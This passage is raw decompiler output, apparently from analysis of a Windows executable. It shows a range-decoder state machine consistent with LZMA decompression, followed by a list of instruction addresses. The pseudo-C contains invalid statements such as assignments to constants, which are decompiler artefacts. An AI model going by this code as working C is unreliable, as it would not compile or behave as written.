											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                                                        0x00000000
                                                                                                        0x00406767
                                                                                                        0x00406767
                                                                                                        0x0040676b
                                                                                                        0x00406790
                                                                                                        0x0040679a
                                                                                                        0x00000000
                                                                                                        0x0040676d
                                                                                                        0x0040676d
                                                                                                        0x00406770
                                                                                                        0x00406774
                                                                                                        0x00406777
                                                                                                        0x0040677a
                                                                                                        0x0040677e
                                                                                                        0x0040677e
                                                                                                        0x00406781
                                                                                                        0x0040685b
                                                                                                        0x0040685b
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x004068fd
                                                                                                        0x00406900
                                                                                                        0x00406905
                                                                                                        0x00406906
                                                                                                        0x00406908
                                                                                                        0x0040690a
                                                                                                        0x0040690d
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fbe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x00000000
                                                                                                        0x00405fcf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fd8
                                                                                                        0x00405fdb
                                                                                                        0x00405fde
                                                                                                        0x00405fe2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fe8
                                                                                                        0x00405feb
                                                                                                        0x00405fed
                                                                                                        0x00405fee
                                                                                                        0x00405ff1
                                                                                                        0x00405ff3
                                                                                                        0x00405ff4
                                                                                                        0x00405ff6
                                                                                                        0x00405ff9
                                                                                                        0x00405ffe
                                                                                                        0x00406003
                                                                                                        0x0040600c
                                                                                                        0x0040601f
                                                                                                        0x00406022
                                                                                                        0x0040602e
                                                                                                        0x00406056
                                                                                                        0x00406058
                                                                                                        0x00406066
                                                                                                        0x00406066
                                                                                                        0x0040606a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x0040605a
                                                                                                        0x0040605d
                                                                                                        0x0040605e
                                                                                                        0x0040605e
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x00406034
                                                                                                        0x00406039
                                                                                                        0x00406039
                                                                                                        0x00406042
                                                                                                        0x0040604a
                                                                                                        0x0040604d
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406070
                                                                                                        0x00406070
                                                                                                        0x00406074
                                                                                                        0x00406920
                                                                                                        0x00000000
                                                                                                        0x00406920
                                                                                                        0x0040607d
                                                                                                        0x0040608d
                                                                                                        0x00406090
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406096
                                                                                                        0x0040609a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040609c
                                                                                                        0x004060a2
                                                                                                        0x004060cc
                                                                                                        0x004060d2
                                                                                                        0x004060d9
                                                                                                        0x00000000
                                                                                                        0x004060d9
                                                                                                        0x004060a8
                                                                                                        0x004060ab
                                                                                                        0x004060b0
                                                                                                        0x004060b0
                                                                                                        0x004060bb
                                                                                                        0x004060c3
                                                                                                        0x004060c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040610b
                                                                                                        0x00406111
                                                                                                        0x00406114
                                                                                                        0x00406121
                                                                                                        0x00406129
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060e0
                                                                                                        0x004060e0
                                                                                                        0x004060e4
                                                                                                        0x0040692f
                                                                                                        0x00000000
                                                                                                        0x0040692f
                                                                                                        0x004060f0
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fe
                                                                                                        0x00406101
                                                                                                        0x00406104
                                                                                                        0x00406109
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
